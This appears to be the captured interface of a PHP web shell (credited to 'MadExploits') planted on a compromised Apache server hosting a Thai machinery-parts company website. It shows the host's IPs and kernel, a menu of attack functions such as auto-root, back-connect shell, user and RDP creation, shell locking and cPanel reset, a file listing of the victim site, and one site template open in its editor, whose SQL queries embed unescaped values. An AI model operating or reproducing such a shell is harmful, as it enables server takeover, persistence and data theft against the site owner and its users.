Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.189.192.75
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
pjmachinerypart.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
css2
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
js2
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
1Head.php
5.45
KB
-rwxr-xr-x
2HeadMenu - Copy.php
11.01
KB
-rwxr-xr-x
2HeadMenu.php
12.77
KB
-rwxr-xr-x
2banner.php
4.95
KB
-rwxr-xr-x
3Footer.php
13.11
KB
-rwxr-xr-x
4End.php
1.1
KB
-rwxr-xr-x
BBservice.php
3.2
KB
-rwxr-xr-x
Category_Machine.php
6.3
KB
-rwxr-xr-x
about_us.php
4.36
KB
-rwxr-xr-x
category.php
9.26
KB
-rwxr-xr-x
contact.php
3.87
KB
-rwxr-xr-x
detail.php
16.75
KB
-rwxr-xr-x
index.php
181
B
-rwxr-xr-x
portfolio.php
3.41
KB
-rwxr-xr-x
product.php
7.66
KB
-rwxr-xr-x
product_detail.php
9.74
KB
-rwxr-xr-x
service.php
3.51
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2HeadMenu - Copy.php
<header> <!-- Header Top Start Here --> <div class="header-top" style="background-color: #a8aaae;"> <div class="container"> <div class="col-sm-12"> <div class="row justify-content-lg-between justify-content-center"> <!-- Header Top Left Start --> <div class="header-top-left order-2 order-lg-1"> <ul> <li> <a href="#" style="color: #fff;"><i class="fa fa-phone"></i> (08) 123 456 7890</a> </li> <li> <a href="#" style="color: #fff;"><i class="fa fa-envelope-open-o"></i> yourmail@domain.com</a> </li> </ul> </div> <!-- Header Top Left End --> <!-- Header Top Right Start --> <div class="header-top-right order-1 order-lg-2"> <ul> <li> <ul class="social-icon"> <li> <a href="#" style="color: #fff;"> <i class="fa fa-facebook" aria-hidden="true"></i> </a> </li> <li> <a href="#" style="color: #fff;"> <i class="fa fa-rss" aria-hidden="true"></i> </a> </li> <li> <a href="#" style="color: #fff;"> <i class="fa fa-twitter" aria-hidden="true"></i> </a> </li> <li> <a href="#" style="color: #fff;"> <i class="fa fa-youtube" aria-hidden="true"></i> </a> </li> <li> <a href="#" style="color: #fff;"> <i class="fa fa-google-plus" aria-hidden="true"></i> </a> </li> <li> <a href="#" style="color: #fff;"> <i class="fa fa-instagram" aria-hidden="true"></i> </a> </li> </ul> </li> </ul> </div> <!-- Header Top Right End --> </div> </div> </div> <!-- Container End --> </div> <!-- Header Top End Here --> <!-- Header Middle Start Here --> <div class="header-middle stick header-sticky" style="background: #dddfe0;"> <div class="container"> <div class="row align-items-center"> <!-- Logo Start --> <div class="col-xl-3 col-lg-2 col-6"> <div class="logo"> <a href="index.html"> <img src="img/logo.png" alt="PJ" style="width: 100px;"> </a> </div> </div> <!-- Logo End --> <!-- Menu Area Start Here --> <div class="col-xl-9 col-lg-8 d-none d-lg-block"> <nav> <ul class="header-bottom-list d-flex"> <li> <a href="index.php">หน้าแรก</a> </li> <?PHP $SQL_Sub_Menu = " SELECT ProductCategory_ID , ProductCategory_Name , StatusProductCategory_ID , ProductCategory_img FROM product_category WHERE ProductCategory_ID != 13 ORDER BY ProductCategory_ID "; $objQuery_SubMenu = $objConnect->query($SQL_Sub_Menu); while ($objResult_SubMenu = mysqli_fetch_array($objQuery_SubMenu)) { $ProductCategoryID = $objResult_SubMenu["ProductCategory_ID"]; $ProductCategoryName = $objResult_SubMenu["ProductCategory_Name"]; ?> <li> <a class="drop-icon" href="product.php?ID=<?= $ProductCategoryID; ?>"><?= $ProductCategoryName; ?></a> <ul class="ht-dropdown"> <?PHP $SQL_Category = " SELECT ProductCategory2_ID , ProductCategory_ID , ProductCategory2_Name , StatusProductCategory2_ID FROM product_category2 WHERE ProductCategory2_ID != 61 AND ProductCategory_ID = $ProductCategoryID ORDER BY ProductCategory2_ID "; $objQuery_Category = $objConnect->query($SQL_Category); while ($objResult_category = mysqli_fetch_array($objQuery_Category)) { $ProductCategory2_ID = $objResult_category["ProductCategory2_ID"]; $ProductCategory2_Name = $objResult_category["ProductCategory2_Name"]; $SQL_Category3 = " SELECT ProductCategory2_ID , ProductCategory3_ID , ProductCategory3_Name FROM product_category3 WHERE ProductCategory2_ID = $ProductCategory2_ID ORDER BY ProductCategory3_ID "; $objQuery_Category3 = $objConnect->query($SQL_Category3); $CHK_COUNT_Category3 = mysqli_num_rows($objQuery_Category3); ?> <?PHP if ($CHK_COUNT_Category3 >= 1) { ?> <li> <a href="Category.php?ID=<?= $ProductCategory2_ID; ?>&Name=<?= $ProductCategory2_Name; ?>" style="color: #fff;">- <?= $ProductCategory2_Name; ?></a> </li> <?PHP } else { ?> <li> <a href="Category.php?ID=<?= $ProductCategory2_ID; ?>&Name=<?= $ProductCategory2_Name; ?>" style="color: #fff;">- <?= $ProductCategory2_Name; ?></a> </li> <?PHP } ?> <?PHP } ?> </ul> </li> <?PHP } ?> <li> <a href="contact.php">ติดต่อเรา</a> </li> </ul> </nav> </div> </div> <!-- Row End --> <!-- Mobile Menu Start Here --> <div class="mobile-menu d-block d-lg-none"> <nav> <ul> <li> <a href="index.php">หน้าแรก</a> </li> <li> <a href="about_us.php">เกี่ยวกับเรา</a> </li> <?PHP $SQL_Sub_Menu = " SELECT ProductCategory_ID , ProductCategory_Name , StatusProductCategory_ID , ProductCategory_img FROM product_category WHERE ProductCategory_ID != 13 ORDER BY ProductCategory_ID "; $objQuery_SubMenu = $objConnect->query($SQL_Sub_Menu); while ($objResult_SubMenu = mysqli_fetch_array($objQuery_SubMenu)) { $ProductCategoryID = $objResult_SubMenu["ProductCategory_ID"]; $ProductCategoryName = $objResult_SubMenu["ProductCategory_Name"]; ?> <li> <a href="product.php?ID=<?= $ProductCategoryID; ?>"><?= $ProductCategoryName; ?></a> <ul> <?PHP $SQL_Category = " SELECT ProductCategory2_ID , ProductCategory_ID , ProductCategory2_Name , StatusProductCategory2_ID FROM product_category2 WHERE ProductCategory2_ID != 61 AND ProductCategory_ID = $ProductCategoryID ORDER BY ProductCategory2_ID "; $objQuery_Category = $objConnect->query($SQL_Category); while ($objResult_category = mysqli_fetch_array($objQuery_Category)) { $ProductCategory2_ID = $objResult_category["ProductCategory2_ID"]; $ProductCategory2_Name = $objResult_category["ProductCategory2_Name"]; ?> <li> <a href="Category.php?ID=<?= $ProductCategory2_ID; ?>&Name=<?= $ProductCategory2_Name; ?>"><?= $ProductCategory2_Name; ?></a> </li> <?PHP } ?> </ul> </li> <?PHP } ?> <li> <a href="contact_us.php">ติดต่อเรา</a> </li> </ul> </nav> </div> <!-- Mobile Menu End Here --> </div> <!-- Container End --> </div> <!-- Header Middle End Here --> </header>
Close